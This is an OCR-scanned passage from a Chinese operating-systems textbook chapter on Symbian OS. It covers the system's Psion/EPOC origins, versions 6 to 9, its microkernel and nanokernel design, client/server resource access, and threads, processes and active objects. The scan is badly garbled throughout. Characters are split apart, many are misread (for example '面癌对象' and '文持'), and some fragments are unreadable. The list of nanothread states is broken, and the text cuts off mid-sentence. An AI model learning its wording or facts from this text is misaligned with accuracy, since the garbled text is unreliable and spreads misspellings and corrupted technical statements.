Symbian 操作 系统 起 源 于 和 营 上 设备 ， 随 后 经 历 了 几 个 版 本 的 升级 得 
到 快速 友 展 。 


12.1.1 Symbian 操作 系统 的 起 源 : Psion 和 EPOC 


Symbian 操作 系统 继承 于 某 些 最 初 的 党 上 设备 。20 世 纪 80 年 代 未 ， 
作为 将 台式 设备 的 功能 整合 到 小 型 的 可 移动 装置 中 的 一 个 手段 ， 掌 上 设 
备 得 到 发 展 。 对 掌上 电脑 的 初次 尝试 并 没有 引起 太 多 的 注意 。Apple 
Newton 是 一 个 设计 良好 的 掌上 电脑 设备 ， 但 只 在 少数 使 用 者 中 间 流 行 。 
里 然 开 始 很 缓慢 ， 但 20 世 纪 90 年 代 中 期 发 展 的 掌上 电脑 则 已 经 针对 用 户 
以 及 人 们 使 用 移动 设备 的 方式 进行 了 更 好 的 修改 。 掌 上 电脑 最 初 设计 为 
PDA， 证 电子 规划 员 的 个 人 数码 助手 ， 不 断 地 发 展 并 具有 了 多 种 功能 。 
随 着 它们 的 发 展 ， 在 功能 上 已 经 趋向 于 台式 机 ， 也 相应 地 有 了 与 台式 机 














同样 的 需求 。 它 们 需要 多 任务 的 处 理 方式 ， 需 要 增加 多 种 形式 的 存储 能 
JJ; 需要 在 输入 输出 上 更 加 灵活 。 


掌上 设备 也 逐渐 包含 了 通信 功能 。 随 着 个 人 设备 的 发 展 ， 个 人 通信 
也 同样 在 发 展 厦 。 移 动 电话 的 使 用 在 20 世 纪 90 年 代 末 期 有 了 飞速 的 发 
展 。 因 此 ， 将 掌上 设备 与 移动 电话 相 结合 形成 智能 手机 是 一 件 很 目 然 的 
事情 。 而 随 着 这 种 合并 的 产生 ， 在 掌上 设备 里 运行 的 操作 系统 也 不 得 不 
发 展 。 








在 20 世 纪 90 年 代 ，Psion 电 脑 公司 制造 了 PDA 设 备 。1991 年 ，Psion 
生产 了 Series 3 一 一 一 个 配 有 小 尺寸 单 色 显 示 屏 的 小 型 电脑 ， 小 到 可 以 放 
入 口袋 中 。 在 Series 3 之 后 ，1996 年 又 制造 了 具有 红外 功能 的 Series 3c, 
1998 年 又 生产 了 有 具有 更 快 处 理 占 速度 以 及 更 多 内 存 容量 的 Series 3mx。 
它们 各 上 自 均 获 得 了 成 功 ， 而 它们 的 成 功 主 要 源 自 其 民 好 的 功 耗 管理 以 及 
与 包括 个 人 电脑 和 掌上 设备 在 内 的 其 他 设备 之 间 的 互通 性 。 程 序 是 用 C 
语言 实现 的 ， 利 用 面向 对 象 设计 ， 并 采用 了 "应 用 引擎 一 一 Symbian 操 
作 系 统 发 展 中 的 一 个 重要 部 分 。 这 种 引擎 方案 功能 强大 。 它 借鉴 了 微 内 
核 的 设计 ， 从 而 强调 类 似 于 服务 器 般 的 引擎 的 功能 性 一 一 通过 回应 来 自 
各 应 用 程序 的 请 求 进行 功能 管理 。 这 种 方式 使 得 它 可 以 拥有 标准 化 的 
API 以 及 利用 对 象 的 抽象 来 使 得 应 用 程序 编程 者 免 于 诸如 数据 格式 等 令 
人 麻烦 的 细节 问题 。 




















1996 年 ，Psion 开 始 设计 一 种 新 型 的 32 位 操作 系统 ， 它 支持 触摸 屏 


上 的 定位 设备 ， 采 用 多 媒体 技术 ， 并 且 具 有 更 丰富 的 通信 功能 。 这 个 新 
的 系统 同时 也 更 加 面向 对 象 ， 并 且 可 以 移植 到 不 同 的 体系 结构 和 设备 设 
计 上 。Psion 的 付出 所 得 到 的 结果 是 系统 EPOC 版 本 1 的 推出 。EPOC 由 
C++ 编 程 实现 ， 并 且 是 彻底 的 面向 对 象 的 设计 。 它 依然 使 用 了 引擎 方 
案 ， 并 将 这 个 设计 理念 扩展 到 协同 访问 系统 服务 和 外 部 设备 的 一 系列 服 
务 器 。EPOC 扩 展 了 通信 能 力 ， 开 发 了 多 媒体 ， 引 入 了 新 的 针对 触摸 屏 
等 接口 的 平台 ， 并 通用 化 了 硬件 接口 。 


之 后 EPOC 又 继续 发 展 了 两 个 版 本 : EPOC 版 本 3 (ER3) 和 EPOC 版 
本 5 (ER5) 。 它 们 在 新 的 Psion Series 5 及 Series 7 的 电脑 平台 上 运行 。 





Psion 同 时 也 试图 强调 它 的 操作 系统 可 以 适用 于 其 他 硬件 平台 。 在 
2000 年 左右 ， 新 的 掌上 设备 发 展 的 最 大 机 会 在 手机 业务 ， 而 在 这 方面 ， 
众多 厂商 一 直 都 在 为 它 的 下 一 代 设 备 寻找 一 个 新 的 先进 的 操作 系统 。 为 
了 利用 这 些 机 会 ，Psion 与 手机 业 的 巨头 ， 包 括 Nokia、Ericsson、 
Motorola 以 及 Matsushita (Panasonic) ， 成 立 了 一 个 合资 项 目 Symbian， 
用 来 控制 EPOC 操 作 系统 核心 的 所 有 权 并 使 其 继续 发 展 。 这 一 新 的 内 核 
设计 现在 称 为 Symbian 操作 系统 。 











12.1.2 ”Symbian 操作 系统 版 本 6 


鉴于 EPOC 的 最 后 一 个 版 本 为 ER5， 因 此 Symbian 操作 系统 在 2001 年 
以 版 本 6 首发 。 它 利用 了 EPOC 的 灵活 特性 ， 并 主要 面向 儿 个 不 同 的 通用 
平台 。 其 设计 非常 灵活 ， 从 而 满足 了 发 展 各 种 高 级 移动 设备 以 及 手机 的 
需要 ， 同 时 允许 众多 厂商 具有 区 别 各 上 自 产 品 的 能 

















同时 ，Symbian 操 作 系 统 将 会 积极 采用 现代 最 先进 的 、 成 熟 的 关键 
技术 。 这 更 强化 了 对 于 面 癌 对 象 以 及 客户 机 -服务 器 结构 的 选择 ， 正 如 
它们 在 台式 机 以 及 网 络 世 界 的 愈加 广泛 的 使 用 。 


Symbian 操作 系统 版 本 6 被 它 的 设计 者 们 称 为 “开放 的 ”。 这 个 “ 开 
放 ? 不 同 于 UNIX 以 及 Linux 那 样 的 开源 特性 。 这 里 , “开放 ?” 指 的 是 这 个 
操作 系统 的 结构 是 公开 的 并 且 是 大 家 均 可 获得 的 。 另 外 ， 所 有 的 系统 接 
口 也 都 公开 ， 从 而 鼓励 第 三 方 软件 的 开发 。 








12.1.3 Symbian 操作 系统 版 本 7 


Symbian 操作 系统 版 本 6 在 设计 和 功能 上 很 像 EPOC 以 及 版 本 6 以 前 的 
版 本 。 它 的 设计 主要 着 眼 于 移动 电话 。 此 后 ， 随 着 越 来 越 多 的 厂商 设计 
了 移动 电话 ， 即 使 是 EPOC 的 灵活 性 也 不 能 够 应 付 如 此 众多 的 移动 电话 
对 Symbian 操 作 系 统 的 使 用 需求 。 








Symbian 操 作 系 统 版 本 7 保持 了 EPOC 的 台式 机 功能 ， 但 是 大 部 分 系 
统 内 部 被 重 写 了 以 包含 多 种 智能 手机 功能 。 操 作 系 统 内 核 以 及 操作 系统 
服务 从 用 户 界面 中 分 离 出 来 。 相 同 的 操作 系统 现在 可 以 在 众多 不 同 的 知 
能 手机 平台 上 运行 了 了， 它们 各 目 拥 有 者 不 同 的 用 户 界 面 系统 。Symbian 
操作 系统 现在 可 以 扩展 以 处 理 新 的 不 可 预期 的 信息 格式 或 者 用 在 使 用 不 
同 的 电话 技术 的 智能 手机 上 。Symbian 操 作 系统 版 本 7 发 布 于 2003 年 。 


12.1.4 今天 的 Symbian 操作 系统 


Symbian 操 作 系 统 版 本 7 是 一 个 重要 的 版 本 ， 因 为 它 将 抽象 性 以 及 灵 
活性 带 入 了 操作 系统 。 然 而 ， 这 种 抽象 是 有 代价 的 。 操 作 系 统 的 性 能 不 
久 便 成 为 一 个 需要 解决 的 问题 。 


于 是 重 写 操作 系统 的 工程 义 开 始 了 ， 这 次 主要 着 眼 于 性 能 。 这 个 新 
的 操作 系统 设计 旨 在 保持 Symbian 操作 系统 版 本 7 的 灵活 性 的 同时 提高 其 
性 能 ， 并 增强 其 安全 性 。Symbian 操 作 系统 版 本 8， 发 布 于 2004 年 ， 提 高 
了 Symbian 操作 系统 的 性 能 ， 无 其 是 在 其 实时 功能 上 。Symbian 操 作 系统 
版 本 9 发 布 于 2005 年 ， 增 加 了 基于 性 能 的 安全 以 及 看 门 机 制 安装 的 概 
念 。 如 同 Symbian 操 作 系统 版 本 7 增加 软件 的 灵活 性 那样 ，Symbian 操 作 
系统 版 本 9 增加 了 针对 硬件 的 灵活 性 。 一 个 新 的 二 进 制 模型 得 到 了 开 
发 ， 从 而 使 得 硬件 开发 者 可 以 使 用 Symbian 操作 系统 ， 而 不 必 重 新 设计 
人 硬件 使 其 适应 茶 一 特定 的 结构 模型 。 


12.2 ”Symbian 操作 系统 概述 


前 一 节 介绍 过 ，Symbian 操 作 系 统 是 由 一 个 掌上 设备 操作 系统 及 展 
成 为 一 个 以 实时 性 能 作为 目标 的 用 在 智能 手机 平台 上 的 操作 系统 。 这 一 
节 里 我 们 将 对 Symbian 操作 系统 设计 中 于 合 的 概念 作 简单 的 介绍 。 这 些 
概念 与 如 何 使 用 这 个 操作 系统 县 上 县 相关 。 


Symbian 是 一 个 独特 的 操作 系统 ， 因 为 它 是 以 智能 手机 作为 目标 平 
台 的 。 它 不 是 将 一 般 的 操作 系统 便装 入 智能 手机 《有 很 大 的 难度 ) ， 也 
不 是 使 较 大 的 操作 系统 适应 于 较 小 的 平台 。 然 而 ， 它 确实 包含 了 许多 其 
他 大 型 操作 系统 所 具有 的 特性 ， 从 多 任务 到 内 存 管理 再 到 安全 问题 。 


Symbian 操 作 系 统 继承 了 其 前 身 的 最 佳 的 特性 ， 具 有 由 EPOC 传 承 下 
来 的 面向 对 象 特性 。 并 且 如 版 本 6 中 所 引入 的 ， 使 用 了 微 内 核 的 设计 方 
案 ， 最 小 化 了 内 核 的 开销 ， 将 不 必要 的 功能 移 到 了 用 户 层 进程 。 它 模仿 
EPOC 中 应 用 的 引擎 模型 ， 使 用 了 客户 机 /服务 器 结构 。 它 支持 多 种 台式 
机 功能 ， 包 括 多 任务 和 多 线程 ， 以 及 可 扩展 存储 系统 。 它 还 继承 了 
EPOC 中 强调 的 多 媒体 与 通信 。 





12.2.1 面向 对 象 





面向 对 象 是 一 个 意味 着 抽象 的 术语 。 在 一 个 面向 对 象 的 设计 中 ， 针 


对 东 个 系统 成 分 的 数据 和 功能 ， 建 立 一 个 抽象 的 实体 ， 称 为 对 象 。 

对 象 提供 了 具体 的 数据 以 及 功能 ， 但 隐藏 了 具体 实现 。 一 个 合理 实现 的 
对 象 可 以 被 移 除 并 被 男 外 一 个 不 同 的 对 象 代 蔡 ， 只 要 系统 其 他 部 分 对 这 
个 对 象 的 使 用 (也 即 其 接口 ) 保持 不 变 。 





当面 向 对 象 应 用 到 操作 系统 设计 中 时 ， 就 意味 着 所 有 的 系统 调用 以 
及 内 核 端 功能 的 使 用 均 要 通过 接口 ， 而 不 能 直接 获取 实际 数据 或 依靠 其 
他 类 型 的 实现 。 一 个 面向 对 象 的 内 核 的 实现 通过 对 象 来 提供 内 核 功 能 
使 用 内 核 端 对 象 通常 意味 着 一 个 应 用 程序 具有 一 个 对 象 的 句柄 ， 也 就 是 
对 对 象 的 一 个 引用 ， 然 后 通过 这 个 句柄 来 获得 对 该 对 象 接口 的 访问 。 





Symbian 操作 系统 采用 了 面 癌 对 象 的 设计 。 系 统 功能 的 实现 是 隐藏 
的 ， 系 统 数据 的 使 用 通过 系统 对 象 已 定义 的 接口 完成 。 在 Linux 等 操作 
系统 中 ， 构 建 一 个 文件 描述 符 ， 并 将 这 个 描述 符 作 为 open 调 用 的 参数 ; 
而 在 Symbian 操作 系统 中 则 会 创建 一 个 文件 对 象 ， 然 后 调用 该 对 象 的 
open 方 法 。 举 例 来 说 ， 在 Linux 操 作 系 统 中 ， 正 如 大 家 所 知道 的 ， 文 件 
描述 符 对 应 于 系统 和 内存 中 文件 描述 符 表 的 索引 的 整数 表示 ;而 在 
Symbian 操作 系统 中 ， 文 件 系统 表 的 实现 是 未 知 的 ， 而 所 有 的 文件 操作 
古 通 过 一 个 特定 的 文件 类 的 对 象 来 实现 的 。 











需要 注意 的 是 Symbian 操 作 系 统 与 其 他 在 设计 中 运用 了 面 同 对 象 理 
念 的 操作 系统 不 同 。 例 如 ， 许 多 操作 系统 设计 使 用 了 抽象 数据 类 型 ， 人 
们 甚至 可 以 说 系统 调用 整个 理念 束 是 通过 将 系统 实现 细节 对 用 户 程序 隐 





藏 起 来 而 实现 了 抽象 。 而 对 于 Symbian 操作 系统 ， 整 个 操作 系统 的 结构 
均 是 面 回 对 象 设 计 的 。 操 作 系 统 功 能 以 及 系统 调用 都 是 与 系统 对 象 相 联 
系 的。 资源 分 配 以 及 保护 则 是 对 应 于 对 象 的 分 配 ， 而 不 是 系统 调用 的 实 
现 。 








12.2.2 uA Kitt 


具有 面向 对 象 内 在 特性 的 Symbian 操作 系统 的 内 核 结 构 是 微 内 核 设 
计 。 内 核 中 包括 最 小 限度 的 系统 功能 以 及 数据 ， 许 多 系统 功能 被 放 到 了 
用 户 空 间 服务 器 逆 。 服 务 器 剖 通 过 获得 系统 对 象 的 句 顶 并 对 这 些 对 象 进 
行 必 要 的 系统 调用 来 完成 各 上 自 的 服务 。 用 户 空 间 应 用 程序 与 这 些 服务 器 
端 进行 交互 而 不 是 采取 系统 调用 。 





典型 的 基于 人 微 内 核 的 操作 系统 初始 化 引导 时 占用 较 少 的 内 存 ， 并 且 
其 结构 也 更 加 动态 。 当 需要 时 可 以 启动 服务 器 ， 而 在 局 动 时 并 不 需要 全 
部 的 服务 器 。 微 内 核 大 多 为 可 插 拔 结构 ， 人 允许 当 需 要 时 加 载 系 统 模 块 并 
插入 到 内 核 中 。 因 此 ， 微 内 核 结构 十 分 灵活 : 文 持 新 功能 的 代码 〈 例 
如 ， 新 硬件 驱动 程序 ) 可 以 随时 加 载 和 插入 。 








Symbian 操作 系统 被 设计 为 基于 微 内 核 的 操作 系统 。 通 过 打开 与 资 
源 服务 器 端的 连接 访问 系统 资源 ， 资 源 服 务 器 随后 协同 访问 资源 本 刁 。 
Symbian 操作 系统 文 持 对 于 新 的 实现 的 可 插 拔 结构 。 对 于 系统 功能 的 新 
的 实现 可 以 设计 为 系统 对 象 ， 并 动态 插入 到 内 核 中 。 例 如 ， 可 以 实现 新 
的 文件 系统 并 且 在 操作 系统 运行 的 同时 添加 到 内 核 中 。 





这 种 微 内 核 的 设计 也 带 来 了 一 些 需 要 探讨 的 话题 。 在 传统 的 操作 系 
统 中 一 个 系统 调用 便 已 足够 时 ， 微 内 核 使 用 消息 传递 。 性 能 可 能 会 由 于 


对 象 间 通 信 所 增加 的 花费 而 受到 影响 。 在 传统 操作 系统 中 位 于 内 核 的 那 
些 功能 被 移 到 用 户 空间 时 效率 可 能 会 降低 。 举 例 来 说 ， 与 可 以 直接 访问 
内 核 数据 结构 的 windows 内 核 中 的 进程 调度 相 比 ， 进 程 调 度 的 多 函数 调 
用 的 开销 降低 了 性 能 。 由 于 在 用 户 空 间 与 内 核 空 间 对 象 中 传递 消 轧 ， 会 
经 常 发 生 特 权 级 切换 ， 这 就 更 降低 了 它 的 性 能 。 最 后 ， 在 传统 设计 方案 
中 只 用 到 了 一 个 地 址 空间 的 系统 调用 ， 而 这 种 消息 传递 以 及 优先 级 转换 
意味 着 至 少 需 要 用 到 两 个 地 址 空间 来 完成 一 个 微 内 核 服务 请 求 。 








这 些 性 能 问题 使 得 Symbian 操 作 系 统 〈 以 及 其 他 基于 微 内 核 的 操作 
系统 ) 的 设计 者 们 对 于 设计 以 及 实现 细节 给 予 了 极 大 关注 。 设 计 的 重点 
征 最 小 化 的 、 紧 凑 的 集中 服务 。 


12.2.3 Symbian 操作 系统 纳 核 


Symbian 操作 系统 的 设计 者 们 在 操作 系统 设计 的 核心 采用 了 一 种 纳 
核 的 结构 来 处 理 微 内 核 所 具有 的 问题 。 正 如 在 微 内 核 结 构 中 ， 某 些 系 统 
功能 被 移 到 了 用 户 空间 服务 器 器 ，Symbian 操 作 系统 将 需要 复杂 实现 的 
功能 分 离 到 内 核 中 ， 而 只 将 最 基本 的 功能 放 在 系统 核心 的 纳 核 中 。 





在 Symbian 操作 系统 中 ， 纳 核 提 供 部 分 最 基本 的 功能 。 在 纳 核 中 ， 
运行 在 特权 级 别 的 简单 线程 完成 者 十 分 初级 的 功能 。 在 这 一 层 的 实现 中 
包括 调度 同步 操作 、 中 断 处 理 和 同步 对 象 ， 如 互 太 变量 以 及 信和 号 量 。 这 
一 层 中 的 实现 功能 大 多 是 可 抢占 的 ， 而 且 是 非常 初级 的 (所 以 它们 可 以 
很 快 )。 例 如 ， 动 态 内 存 分 配对 于 纳 核 就 是 过 于 复杂 的 功能 。 














这 种 纳 核 的 设计 需要 一 个 二 级 层次 来 实现 较为 复杂 的 内 核 功能 。 
Symbian 操作 系统 内 核 层 提 供 了 操作 系统 所 需要 的 其 他 较为 复杂 的 内 核 
功能 。 每 个 在 Symbian 操作 系统 内 核 层 的 操作 都 是 特权 级 的 操作 ， 并 与 
纳 核 层 的 初级 操作 一 起 来 完成 更 加 复杂 的 内 核 工作 。 复 杂 的 对 象 服务 、 
用 户 态 线程 、 进 程 调度 以 及 上 下 文 切换 、 动 态 内 存 、 动 态 库 加 载 、 复 杂 
的 同步 、 对 象 及 进程 间 通 信 只 是 在 这 层 实现 的 部 分 操作 。 这 层 是 完全 可 
抢占 式 的 ， 并 且 中 断 可 以 使 其 对 任何 一 部 分 的 执行 进行 重新 调度 ， 即 使 
是 在 上 下 文 转换 的 过 程 中 也 可 以 。 








图 12-1 展 示 了 一 个 完整 的 Symbian 操作 系统 内 核 的 结 松 
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图 12-1 Symbian 操 作 系 统 内 核 结 构 具 有 多 层 


12.2.4 客户 机 /服务 器 资源 访问 


正如 我 们 所 提 到 的 那样 ，Symbian 操 作 系 统 使 用 微 内 核 设 计 并 使 用 
客户 机 /服务 器 模型 来 访问 系统 资源 。 需 要 访问 系统 资源 的 应 用 是 客户 
端 ， 操 作 系 统 中 运行 看 的 用 来 协调 资源 访问 的 程序 是 服务 器 问 。 在 
Linux 中 ， 人 们 可 能 需要 调用 open 来 打开 一 个 文件 ， 在 Windows 中 ， 需 要 
All Microsoft API 来 创建 一 个 窗口 ;而 在 Symbian 操作 系统 中 的 过 程 均 
是 相同 的 : 首先 建立 一 个 到 服务 器 端的 连接 ， 服 务 器 端 需要 确认 这 个 连 
接 ， 然 后 对 服务 器 问 发 出 实现 茶 个 操作 的 请 求 。 因 此 打开 一 个 文件 表示 
找到 文件 服务 器 端 ， 调 用 connect 建 立 与 服务 器 端的 连接 ， 然 后 发 送 给 服 
务 嚣 端 一 个 附 有 茶 特 定 文 件 名 字 的 open 请 求 。 





这 样 做 对 于 保护 资源 有 着 几 点 好 处 。 首 先 ， 它 符合 操作 系统 的 面向 
对 象 以 及 微 内 核 的 设计 。 其 次 ， 这 种 结构 对 于 管理 多 任务 、 多 线程 系统 
中 所 需要 的 资源 多 重 访问 十 分 有 效 。 最 后 ， 每 个 服务 器 都 可 以 专注 于 它 
必须 管理 的 资源 ， 并 能 方便 地 进行 升级 以 及 蔡 换 为 新 的 设计 。 





12.2.5” 较 大 型 操作 系统 的 特点 





尽管 Symbian 操 作 系 统 所 针对 的 目标 电脑 规模 较 小 ， 但 它 有 着 许多 
大 型 系统 的 特点 。 你 可 以 在 Symbian 操作 系统 上 找到 大 型 操作 系统 〈 如 
Linux 以 及 Windows) 的 各 种 特性 ， 只 是 以 另 一 种 形式 出 现 。Symbian 操 
作 系 统 与 较 大 型 的 操作 系统 有 一 些 共 同 的 特性 。 


.进程 与 线程 : Symbian 操作 系统 是 一 个 多 任务 多 线程 的 操作 系统 。 
许多 进程 可 以 同时 和 运行， 相互 间 可 以 进行 通信 ， 也 可 以 在 各 进程 内 运行 
多 个 线程 。 





常见 文件 系统 支持 : Symbian 操作 系统 利用 一 个 文件 系统 模型 来 管 
理 对 系统 存储 空间 的 访问 ， 正 如 大 型 操作 系统 一 样 。 它 具有 一 个 与 
Windows 兼 容 的 默认 文件 系统 〈 默 认 使 用 FAT-32 文 件 系统 ) ， 通 过 使 用 
插件 式 接口 支持 其 他 文件 系统 。Symbian 操 作 系 统 支持 几 种 不 同类 型 的 
文件 系统 ， 包 括 FAT-16、FAT-32、NTFS， 以 及 许多 存储 卡 格式 (例如 
JFFS) 。 


网络: Symbian 操 作 系 统 支 持 TCP/IP 网 络 以 及 其 他 的 通信 接口 ， 例 
如 串 行 、 红 外 和 蓝牙 。 


:内存 管理 : 尽管 Symbian 操作 系统 不 使 用 〈 也 没有 相应 的 设备 ) 虚 





拟 内 存 映 射 ， 但 它 通 过 按 页 管理 实现 对 内 存 访 问 ， 并 文 持 页 的 置换 ， 也 
就 是 说 文 持 页 面 换 入 ， 但 不 文 持 页 面 换 出 。 


12.2.6 ”通信 与 多 媒体 


Symbian 操作 系统 以 多 种 方式 协助 通信 。 我 们 很 难 简单 地 对 其 进行 
概述 而 不 提 及 通信 特点 。 通 信 的 模型 遭 循 面 问 对象 、 微 内 核 以 及 客户 
机 /服务 器 结构 。Symbian 操 作 系统 的 通信 结构 是 以 模块 形式 建立 的 ， 从 
而 多 许 新 的 通信 机 制 方便 地 接 入 操作 系统 。 从 用 户 层 接口 到 新 的 协议 实 
现 ， 到 新 的 设备 驱动 ， 模 块 可 以 实现 任何 功能 。 由 于 这 样 的 微 内 核实 
现 ， 可 以 引入 新 的 模块 并 动态 地 加 载 到 系统 操作 中 。 





由 于 Symbian 操作 系统 只 针对 智能 手机 平台 ， 因 此 有 许多 独特 的 特 
点 。 它 具有 一 个 可 搬 拔 的 消息 结构 ， 可 以 引入 新 的 消息 类 型 ， 并 可 以 通 
过 消息 服务 器 动态 加 载 的 模块 来 实现 。 消 息 系统 被 设计 为 层次 结构 ， 各 
层 由 特定 类 型 的 对 象 来 实现 。 例 如 ， 消 息 传递 对 象 不 同 于 消息 类 型 对 
象 。 一 种 形式 的 消息 传递 ， 例 如 手机 无 线 传递 (类似 于 CDMA) 可 以 传 
送 几 种 不 同类 型 的 消息 《标准 文本 消 筷 类 型 、SMS 类 型 或 者 如 BIO 消 乱 
等 的 系统 指令 ) 。 通 过 实现 新 的 对 象 并 将 其 加 载 到 内 核 中 可 以 引入 新 的 
传递 方法 。 








Symbian 操作 系统 的 核心 设计 有 专门 针对 多 媒体 的 各 种 API。 多 媒体 
设备 以 及 上 下 文 由 特殊 的 服务 器 和 用 户 上 自 定 义 的 结构 《〈 人 允许 用 户 实 现 描 
述 新 的 或 现存 的 上 下 文 以 及 怎样 对 上 下 文 进 行 处 理 的 模块 ) 来 处 理 。 与 


实现 消息 的 方法 相 类 似 ， 多 媒体 是 由 多 种 形式 相互 作用 的 对 象 来 实现 。 
声音 播放 的 方式 被 设计 为 一 个 与 各 种 声音 格式 的 实现 方式 相互 作用 的 对 
象 








o 


12.3. Symbian 操作 系统 中 的 进程 和 线程 


Symbian 操作 系统 是 一 个 多 任务 操作 系统 ， 像 其 他 操作 系统 那样 ， 
使 用 了 进程 和 线程 的 概念 。 然 而 ，Symbian 操 作 系 统 的 内 核 结构 以 及 它 
对 资源 稀缺 性 的 处 理 方 式 影响 了 它 看 竺 这些 多 任务 对 象 的 方式 。 





12.3.1 ”线程 和 纳 线 程 


对 于 多 任务 ，Symbian 操 作 系统 更 倾 问 于 线程 ， 并 且 是 建立 在 线程 
概念 上 的 ， 而 不 是 把 进程 作为 多 任务 的 基础 。 线 程 构成 了 多 任务 的 中 心 
单元 。 操 作 系统 简单 地 把 一 个 进程 看 成 是 具有 一 个 进程 控制 块 和 茶 个 内 
存 空间 的 线程 的 集合 。 





Symbian 操作 系统 对 于 线程 的 文 持 是 基于 纳 线程 的 纳 核 。 纳 核 仅 提 
供 简单 的 线程 文 持 ， 每 个 线程 是 由 一 个 基于 纳 核 的 纳 线程 来 文 持 的 。 纳 
核 为 纳 线程 提供 调度 、 同 步 〈《 线 程 间 通 信 ) 以 及 计时 服务 。 纳 线程 运行 
在 特权 模式 下 ， 需 要 一 个 栈 来 存储 它们 的 运行 时 刻 环 境 数 据 。 纳 线程 不 
能 运行 在 用 户 态 。 这 就 意味 着 操作 系统 能 够 对 每 个 纳 线程 保持 紧密 的 控 
制 。 每 个 纳 线程 需要 一 个 数据 的 极 小 集 来 运行 : 实质 上 就 是 它 的 栈 以 及 
栈 的 大 小 。 操 作 系统 保持 对 其 他 一 切 的 控制 ， 比 如 每 个 线程 使 用 的 代 
码 ， 以 及 在 运行 时 刻 的 栈 上 存储 线程 的 上 下 文 。 








同 进程 具有 状态 一 样 ， 纳 线程 也 具有 线程 状态 。Symbian 操 作 系 统 

的 纳 核 使 用 的 模型 在 基本 模型 中 增加 了 一 些 状态 。 除 了 基本 状态 以 外 ， 
纳 线程 还 可 以 处 于 如 下 状态 : 

: 挂 起 。 这 就 是 当 一 个 线程 挂 起 另 一 个 线程 时 的 状态 ， 与 等 待 状 


ar 


JON 


An 


不 同 ， 在 等 竺 状态 下 一 个 线程 是 被 某 个 上 层 对 象 阻塞 〈 例 如 ， 一 
Symbian 操作 系统 线程 ) 。 
快速 信号 量 等 待 。 
《哨兵 变量 的 一 种 ) 得 到 信号 通知 。 快 速 信 号 量 


(mj 


EARI TE o 





.DFC 等 待 。 处 于 这 种 状态 的 线程 正在 等 待 一 个 延迟 的 函数 调用 或 
者 要 被 加 入 到 DFC 队 列 中 的 DFC。DFC 用 在 设备 驱动 实现 中 。 它 们 代表 
对 于 内 核 的 调用 ， 可 被 Symbian 操作 系统 内 核 层 排 入 队列 并 且 调 度 执 


/一 


介 。 

休眠 。 休 眠 线程 正在 等 候 特 定 长 度 的 时 间 过 去 。 

其他。 还 有 一 种 通用 状态 ， 是 当 开 发 人 员 为 纳 线程 实现 额外 的 状 
态 时 使 用 的 。 当 开发 人 员 为 新 的 手机 平台 《〈 称 作 个 性 层 ) 扩展 纳 核 功能 
时 使 用 该 状态 。 进 行 这 个 工作 的 开发 人 员 也 必须 实现 这 些 状 态 与 他 们 的 
扩展 实现 之 间 的 来 回 跳 转 。 

下 面 将 纳 线程 思想 与 传统 进程 思想 作 比较 。 纳 线程 实际 上 是 一 个 完 


全 轻 量 级 的 进程 。 它 具有 极 小 的 上 下 文 ， 当 纳 线程 进出 处 理 器 时 进行 切 
换 。 每 个 纳 线程 和 进程 一 样 共有 一 个 状态 。 对 于 纳 线程 来 说 ， 关 键 是 纳 
核对 它们 的 紧密 控制 ， 以 及 构成 每 个 纳 线 程 上 下 文 的 极 小 数据 集合 。 





Symbian 操 作 系 统 线 程 依赖 于 纳 线 程 ， 内 核 增加 除 纳 核 提 供 的 功能 
之 外 的 支持 。 标 准 程序 使 用 的 用 户 模 式 线程 由 Symbian 操 作 系 统 线程 执 
行 。 每 个 Symbian 操作 系统 线程 包含 一 个 纳 线程 并 且 添 加 目 己 的 运行 时 
刻 栈 到 纳 线程 使 用 的 栈 中 。Symbian 操 作 系统 线程 可 以 通过 系统 调用 在 
内 核 模 式 下 进行 操作 。Symbian 操 作 系 统 也 能 为 执行 增加 例外 处 理 以 及 


退出 信和 号 。 





Symbian 操作 系统 线程 在 纳 线程 实现 之 上 实现 目 己 的 状态 集 。 由 于 
Symbian 操作 系统 线程 将 一 些 功 能 性 增加 到 纳 线程 实现 中 ， 因 此 新 的 状 
态 反 映 了 构成 Symbian 操作 系统 线程 的 新 的 思想 。Symbian 操 作 系 统 添 加 
了 Symbian 操作 系统 线程 可 以 进入 的 新 的 七 种 状态 ， 来 关注 Symbian 操作 
系统 线程 可 能 出 现 的 特殊 阻 共 条 件 。 这 些 特殊 状态 包括 在 信号 量 上 的 等 
Ate CERIN) 、 互 斥 变量 以 及 条 件 变量 。 由 于 Symbian 操作 系统 
的 实现 处 于 纳 线程 之 上 ， 因 此 这 些 状态 从 茶 种 方面 上 来 说 是 由 纳 线程 状 
态 实 现 的， 通常 都 是 用 不 同 的 方式 使 用 挂 起 的 纳 线程 状态 。 





12.3.2 ”进程 


Symbian 操作 系统 的 进程 ， 就 是 在 一 个 单一 的 进程 控制 块 结构 下 ， 
具有 一 个 单一 存储 空间 的 ， 归 于 一 类 的 Symbian 操作 系统 的 线程 组 。 可 
能 只 有 一 个 执行 的 线程 ， 或 者 一 个 进程 控制 块 下 有 很 多 线程 。Symbian 
操作 系统 线程 和 纳 线 程 已 经 定义 了 进程 状态 和 进程 调度 的 概念 。 因 此 ， 
调度 一 个 进程 实际 上 是 通过 调度 一 个 线程 以 及 初始 化 数据 需要 使 用 的 正 
确 的 进程 控制 块 来 完成 的 。 








Symbian 操作 系统 线程 通过 几 种 方式 ， 在 一 个 单一 进程 的 组 织 下 工 
作 在 一 起 。 首 先 ， 有 一 个 主线 程 被 标志 为 进程 的 起 始点 。 其 次 ， 线 程 共 
译 调度 参数 。 也 就 是 说 ， 进 程 通 过 一 种 调度 方法 一 一 改变 进程 参数 ， 来 
改变 所 有 线程 的 参数 。 第 三 ， 线 程 共享 包括 设备 和 其 他 对 象 描 述 符 的 存 
储 空 间 对 象 。 最 后 ， 当 一 个 进程 终止 时 ， 内 核 终 止 该 进程 的 所 有 线程 。 


12.3.3 ”活动 对 象 








活动 对 象 是 线程 的 特有 形式 ， 用 这 种 方式 实现 以 便 减 轻 它 们 带 给 操 
作 环 境 的 负担 。Symbian 操 作 系统 的 设计 者 意识 到 ， 应 用 中 的 线程 在 很 
多 情况 下 可 能 会 发 生 阻 塞 。 由 于 Symbian 操作 系统 致力 于 通信 工具 方 
面 ， 因 此 许多 应 用 程序 具有 类 似 的 执行 模式 : EMI) MB a BFS 
数据 或 者 通过 管道 发 送信 息 ， 然 后 在 等 待 接收 者 的 啊 应 时 阻塞 。 这 样 设 
计 活 动 对 象 ， 是 为 了 当 它 们 从 这 种 阻 具 状 态 返 回 时 ， 具 有 进入 被 调用 代 

















